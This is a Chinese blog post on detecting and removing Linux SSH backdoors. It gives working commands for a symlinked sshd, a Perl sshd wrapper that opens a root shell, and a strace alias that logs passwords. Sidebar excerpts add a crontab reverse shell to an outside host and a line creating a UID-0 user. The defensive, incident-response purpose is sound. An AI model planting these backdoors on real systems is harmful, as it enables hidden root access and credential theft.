Linux SSH Backdoor分析排查

最新推荐文章于 2024-08-23 08:57:21 发布
最新推荐文章于 2024-08-23 08:57:21 发布
阅读量43 收藏
点赞数
文章标签: linux ssh 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sworld_/article/details/133095105
版权

1、SSH后门分类

SSH后门方式有以下几种

  • 软链接
  • SSH Server wrapper
  • SSH Keylogger

2、软链接

  • 利用方法

[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;

  • 排查方法

[root@helen]# netstat -anop

通过开发端口信息的PID查询进程路径,【ll /proc/xxxx】命令查看程序对应的路径。

  • 清除后门
kill -9 pid
rm -rf 后门程序

3、SSH Server wrapper

  • 利用方法

先将/usr/sbin/sshd文件mv到/usr/bin目录

[root@helen ~]# cd /usr/sbin/
[root@helen sbin]# mv sshd ../bin
[root@helen sbin]# vim sshd

再编辑sshd

#!/usr/bin/perl
exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);
exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

再设置权限

chmod 755 sshd

攻击者:

在本机上执行socat STDIO TCP4:target_ip:22,sourceport=19526

  • 排查方法

查看端口可以看到网络外链的端口

因为正常的sshd路径是在/usr/sbin/sshd,通过命令【ll /proc/xxx】查看sshd的路径路径在/usr/bin/sshd。所以断定sshd被动过手脚。

通过查看sshd文件可得知sshd的确被动过手脚。

cat /usr/sbin/sshd
  • 清除后门
rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

4、SSH Keylogger

  • 利用方法

编辑当前用户下的.bashrc文件

vi /root/.bashrc

在最后面添加如下后门代码:

alias ssh='strace -o /tmp/sshpwd-`date    '+%d%h%m%s'`.log -e read,write,connect  -s2048 ssh'

【source .bashrc】命令使更改的配置生效

ssh连接或者su切换用户,输入密码时的密码,无论错误或者正确都能记录到log里

  • 排查方法

排查环境变量

  • 清除后门

清空增加的环境变量内容

5、参考

https://joychou.org/hostsec/linux-ssh-backdoor.htmlhttp://pastebin.com/2NgL8SDEhttp://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/https://diogomonica.com/posts/poor-man-s-ssh-keylogger/http://drops.wooyun.org/tips/1951

17bdw学编程
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux应急响应入侵排查思路
10-28 1307
0x00 前言 ​ 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路。 0x01 入侵排查思路 一、账号安全 基...
Linux应急响应排查脚本
0xff
11-23 907
#!/bin/bash date=$(date +%Y%m%d) ipadd=$(ifconfig -a | grep -w inet | grep -v 127.0.0.1 | awk 'NR==1{print $2}') check_file="/tmp/xxxxx_${ipadd}_${date}/check_file/" danger_file="/tmp/xxxxx_${ipadd}_${date}/danger_file.txt" log_file="/tmp/xxxxx_${ipadd}_${
linux mysql backdoor_Linux SSH Backdoor分析排查
weixin_34209060的博客
01-27 228
1、SSH后门分类SSH后门方式有以下几种软链接SSH Server wrapperSSH Keylogger2、软链接利用方法[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;排查方法[root@helen]# netstat -anop通过开发端口信息的PID查询进程路径,【ll /proc/xxxx】命令查看程序...
Linux环境入侵应急与排查
流浪法师的博客
02-28 1079
一、账号安全 1、用户信息文件 /etc/passwd 格式:account:password:UID:GID:GECOS:directory:shell 用户名:密码:用户ID:组ID:用户说明:家目录:登陆之后的 shell root❌0:0:root:/root:/bin/bash 查看可登录用户:cat /etc/passwd | grep /bin/bash 查看UID=0的用户 awk -F: ‘$3==0{print $1}’ /etc/passwd 查看sudo权限的用户 more /etc
Linux入侵排查
weixin_56233402的博客
04-20 1244
rpm2cpio /mnt/cdrom/Packages/coreutils-8.4-19.el6.i686.rpm | cpio -idv ./bin/ls 提取rpm包中ls命令到当前目录的/bin/ls下。例子:当我们需要开机启动自己的脚本时,只需要将可执行脚本丢在/etc/init.d目录下,然后在/etc/rc.d/rc*.d中建立软链接即可。启动项文件: more /etc/rc.local /etc/rc.d/rc[0~6].d ls -l /etc/rc.d/rc3.d/
Linux_backdoor
dengzhasong7076的博客
05-13 766
Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;...
Windows、Linux系统入侵简易排查学习笔记
qq_33765205的博客
12-06 1195
对看过的、学习的Windows、Linux系统入侵排查进行记录归纳。如果以后工作遇到类似情况,可以翻出来对照进行简易排查
linux系统安全排查以及朔源应急响应技巧
it知识分享 free for nothing..
09-13 388
linux系统安全排查以及朔源应急响应技巧
linux持久化
HoAd'blog
08-25 1475
linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
Linux.BackDoor.Gates.5木马处理文档
11-13
生产使用的Linux.BackDoor.Gates.5木马处理文档!
backdoored-ssh:后门 ssh
07-22
压缩包文件 "backdoored-ssh-master" 可能包含源代码、分析工具或教程,帮助你深入了解 SSH 后门的工作原理,学习如何检测和移除它们。这些资源可能包括示例脚本、检测工具的源码以及详细的解释文档,帮助你提升网络...
SeayFindShell( linux-python-killwebshell.zip_backdoor_cleariwf_m
09-15
SeayFindShell是一款专为Linux系统设计的Python版本Webshell(Web后门)查杀工具。在网络安全领域,Webshell通常被黑客用于控制系统,执行恶意命令,窃取数据或者进行其他非法活动。SeayFindShell的出现,为系统管理...
backdoor:用 Python 编写的 Linux 后门实现
06-04
Linux后门 COMP 8505 - 作业 3 作者:佐佐木杰弗里 2015 年 5 月 25 日 描述: 该程序采用 Linux 后门实现,攻击者能够远程访问目标机器并获得对可执行命令的控制。 文件: server.py服务器将由受害者的机器运行...
builtin_hack_backdoor_
09-30
backdoor for netgear routers. Can use to hack everyone
多进程和多线程基础概念LINUX
2301_79109608的博客
08-22 924
直接访问物理地址,会导致地址空间没有隔离,很容易导致数据被修改通过虚拟地址空间可以实现每个进程空间都是独立的,操作系统会映射到不用的物理地址区间,在访问时互不干扰.进程状态分为三个基本状态,即运行态,就绪态,阻塞态。在五态模型中,进程分为新建态、终止态,运行态,就绪态,阻塞态。并发:有限的 cpu 核芯的情况下 ,利用快速交替(时间片轮转)执行来达到宏观上的同时执行。虚拟地址 : 虚拟地址并不代表真实的内存空间,而是一个用于寻址的编号。并行:在 cpu 多核的支持下,实现物理上的同时执行。
Linux 线程的控制 互斥与同步
最新发布
qq_63145217的博客
08-23 811
include //头文件sem_t sem;信号量的类型 信号量的变量。
Linux上构建Windows应用程序:深入探索跨平台开发的实践与挑战
w651428055的博客
08-21 1071
Linux上构建Windows应用程序,不仅拓宽了开发者的技能范围,也为软件产品的多平台部署提供了灵活性和成本效益。虽然这一过程面临挑战,但通过合理选择工具、框架和策略,可以有效地克服这些障碍。随着技术的不断进步,跨平台开发将变得更加成熟和便捷,为软件开发带来更多的可能性和机遇。未来,随着更多高效工具和框架的出现,跨平台开发的效率和质量有望进一步提升,为软件工程领域注入新的活力。
windows上传的文本在linux执行不了,格式转换
mengbing1990的博客
08-19 319
在windows编辑的文件脚本上传到linux里面执行不了,进行格式转换
UVM_BACKDOOR是什么
12-05
根据提供的引用内容,没有直接回答UVM_BACKDOOR是什么的信息。但是,可以根据引用内容提供一些相关信息。 引用中提到了uvm_bitstream_t,这是UVM中的一种数据类型,用于在UVM组件之间传递数据。而UVM_BACKDOOR是UVM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值